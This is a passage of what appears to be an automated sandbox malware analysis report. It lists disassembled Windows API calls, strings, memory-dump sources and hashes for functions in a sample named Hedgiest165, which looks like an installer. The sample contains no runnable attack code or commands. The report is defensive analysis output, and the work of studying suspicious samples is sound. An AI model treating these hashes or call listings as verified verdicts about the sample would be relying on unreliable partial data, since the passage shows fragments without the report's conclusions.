                                                                        • lstrcatW.KERNEL32(004226E8,00403385,00403385,004226E8,00000000,?,004031E6), ref: 0040549E
                                                                        • SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: &B
                                                                        • API String ID: 2531174081-3208460036
                                                                        • Opcode ID: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
                                                                        • Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
                                                                        • Opcode Fuzzy Hash: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
                                                                        • Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004043B5
                                                                        • GetSysColor.USER32(00000000), ref: 004043F3
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004043FF
                                                                        • SetBkMode.GDI32(?,?), ref: 0040440B
                                                                        • GetSysColor.USER32(?), ref: 0040441E
                                                                        • SetBkColor.GDI32(?,?), ref: 0040442E
                                                                        • DeleteObject.GDI32(?), ref: 00404448
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                        • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                        • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                        • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                          • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                        • String ID: 9
                                                                        • API String ID: 163830602-2366072709
                                                                        • Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                        • Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
                                                                        • Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                        • Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58
                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,221C9C07,?,00000000,?,00000000,00000000), ref: 221C94D4
                                                                        • __fassign.LIBCMT ref: 221C954F
                                                                        • __fassign.LIBCMT ref: 221C956A
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 221C9590
                                                                        • WriteFile.KERNEL32(?,?,00000000,221C9C07,00000000,?,?,?,?,?,?,?,?,?,221C9C07,?), ref: 221C95AF
                                                                        • WriteFile.KERNEL32(?,?,00000001,221C9C07,00000000,?,?,?,?,?,?,?,?,?,221C9C07,?), ref: 221C95E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1324828854-0
                                                                        • Opcode ID: adb51246917291b4da1c2ce2912ccc26549cefcceac7e0a2697fb9166b725a50
                                                                        • Instruction ID: e49194000d5d046ee9796d2f9dce533e2106005ddc6d2eb4b8bb93e8e5064641
                                                                        • Opcode Fuzzy Hash: adb51246917291b4da1c2ce2912ccc26549cefcceac7e0a2697fb9166b725a50
                                                                        • Instruction Fuzzy Hash: 0D51BF75A40349AFDB10CFA8C895FEEBBF8FF18310F10455AE951E7285D6709A41CBA2
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 221C339B
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 221C33A3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 221C3431
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 221C345C
                                                                        • _ValidateLocalCookies.LIBCMT ref: 221C34B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: aac82844f70fcc68f357500a5a3fd1e185fcba262205a6303d3e21a108531124
                                                                        • Instruction ID: bc90c2a4401fdd71e547fb59d5eaae49be23af8985755d304b08b3f8082bdd55
                                                                        • Opcode Fuzzy Hash: aac82844f70fcc68f357500a5a3fd1e185fcba262205a6303d3e21a108531124
                                                                        • Instruction Fuzzy Hash: 9541A138A403489FCB01CF68C884EDEBBB5AF65328F108165E9159F355D736DB05CB96
                                                                        APIs
                                                                          • Part of subcall function 221C9221: _free.LIBCMT ref: 221C924A
                                                                        • _free.LIBCMT ref: 221C92AB
                                                                          • Part of subcall function 221C571E: HeapFree.KERNEL32(00000000,00000000,?,221C924F,?,00000000,?,00000000,?,221C9276,?,00000007,?,?,221C7E5A,?), ref: 221C5734
                                                                          • Part of subcall function 221C571E: GetLastError.KERNEL32(?,?,221C924F,?,00000000,?,00000000,?,221C9276,?,00000007,?,?,221C7E5A,?,?), ref: 221C5746
                                                                        • _free.LIBCMT ref: 221C92B6
                                                                        • _free.LIBCMT ref: 221C92C1
                                                                        • _free.LIBCMT ref: 221C9315
                                                                        • _free.LIBCMT ref: 221C9320
                                                                        • _free.LIBCMT ref: 221C932B
                                                                        • _free.LIBCMT ref: 221C9336
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction ID: c31aa923363acf238dfdda00b162aac758fd203a62ff74b67316d4f28619196c
                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction Fuzzy Hash: AF117F35580B08FED6B0ABF0DC45FDB7B9EAF34710F800824A6DD7609ADA24B7444652
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
                                                                        • GetMessagePos.USER32 ref: 00404D0F
                                                                        • ScreenToClient.USER32(?,?), ref: 00404D29
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00402F74
                                                                        • wsprintfW.USER32 ref: 00402F84
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402F7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                        • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                        • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                        • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                        • wsprintfW.USER32 ref: 004067B2
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-1946221925
                                                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                        • Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
                                                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                        • Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,221C6FFD,00000000,?,?,?,221C8A72,?,?,00000100), ref: 221C887B
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,221C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 221C8901
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 221C89FB
                                                                        • __freea.LIBCMT ref: 221C8A08
                                                                          • Part of subcall function 221C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 221C5702
                                                                        • __freea.LIBCMT ref: 221C8A11
                                                                        • __freea.LIBCMT ref: 221C8A36
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1414292761-0
                                                                        • Opcode ID: 0f6893906388a912cdf9ecd15a0fdf04ce1591dfda2c1ae6d97a1057ac085c92
                                                                        • Instruction ID: 791a72f41f0bd675cde95b1bf2a635415812d0dba4450f7661bbac9070128a8e
                                                                        • Opcode Fuzzy Hash: 0f6893906388a912cdf9ecd15a0fdf04ce1591dfda2c1ae6d97a1057ac085c92
                                                                        • Instruction Fuzzy Hash: 6051357A690306AFEB168E60CDC0FEB37A9EB60754F520628FD05D6140EB34DE50C6A2
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                        • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
                                                                        • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                        • Opcode Fuzzy Hash: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
                                                                        • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 221C1038
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 221C104B
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 221C1061
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 221C1075
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 221C1090
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 221C10B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                        • String ID:
                                                                        • API String ID: 3594823470-0
                                                                        • Opcode ID: 21f2e95e340da3324592022d4347bd5964d726ea9053264ecf25ae11eaa8ad16
                                                                        • Instruction ID: d1eb423f8a62e78db50d1e6f895747b1aef8d90dd7ed14b65d046b48e5b651f3
                                                                        • Opcode Fuzzy Hash: 21f2e95e340da3324592022d4347bd5964d726ea9053264ecf25ae11eaa8ad16
                                                                        • Instruction Fuzzy Hash: 1021D1399803189BCF50DB64DD48EDF3768EF64324F104696E859A31B1DE309B95CB42
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,221C3518,221C23F1,221C1F17), ref: 221C3864
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 221C3872
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 221C388B
                                                                        • SetLastError.KERNEL32(00000000,?,221C3518,221C23F1,221C1F17), ref: 221C38DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 857d4a0738c679ac101d3d2fa0e4424797b84f3e5a149bcc885458473609b5f0
                                                                        • Instruction ID: 58323488eb1254e51f23c0d204a420b60e82de21732bdf4c1a1e71da3c221df7
                                                                        • Opcode Fuzzy Hash: 857d4a0738c679ac101d3d2fa0e4424797b84f3e5a149bcc885458473609b5f0
                                                                        • Instruction Fuzzy Hash: 8A01243EBCEB12AEE21426796CC9F872BE4DB357757214339E9209C0D5EF154A01970B
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,221C6C6C), ref: 221C5AFA
                                                                        • _free.LIBCMT ref: 221C5B2D
                                                                        • _free.LIBCMT ref: 221C5B55
                                                                        • SetLastError.KERNEL32(00000000,?,?,221C6C6C), ref: 221C5B62
                                                                        • SetLastError.KERNEL32(00000000,?,?,221C6C6C), ref: 221C5B6E
                                                                        • _abort.LIBCMT ref: 221C5B74
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: c964c036bb6f9fed06cd31f2b1d7a231fe7bef78279cc1021c0ea01a7cde5749
                                                                        • Instruction ID: 790c33a780ee8d971d4eb3642a7e9f9f9d45b71d4636a5b081b5413c7ea0f767
                                                                        • Opcode Fuzzy Hash: c964c036bb6f9fed06cd31f2b1d7a231fe7bef78279cc1021c0ea01a7cde5749
                                                                        • Instruction Fuzzy Hash: F2F0F4BE6C4700BEC36612346D45F4B2FAB8BF1A71B220124FD28B6181FE2887024133
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 551687249-2449383134
                                                                        • Opcode ID: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
                                                                        • Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
                                                                        • Opcode Fuzzy Hash: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
                                                                        • Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                        • CharNextW.USER32(?,00000000,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                        • CharPrevW.USER32(?,?,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                        • Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
                                                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                        • Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,221C4AEA,?,?,221C4A8A,?,221D2238,0000000C,221C4BBD,00000000,00000000), ref: 221C4B59
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 221C4B6C
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,221C4AEA,?,?,221C4A8A,?,221D2238,0000000C,221C4BBD,00000000,00000000,00000001,221C2082), ref: 221C4B8F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: d09a270a987c1ba068c18b94a2e14476501664a0e0d76c87e3ca0ef95d002930
                                                                        • Instruction ID: 28d4427f771f924c227dce014b5a3a9619e7709cf362f0b404e4b8b82cf17ec5
                                                                        • Opcode Fuzzy Hash: d09a270a987c1ba068c18b94a2e14476501664a0e0d76c87e3ca0ef95d002930
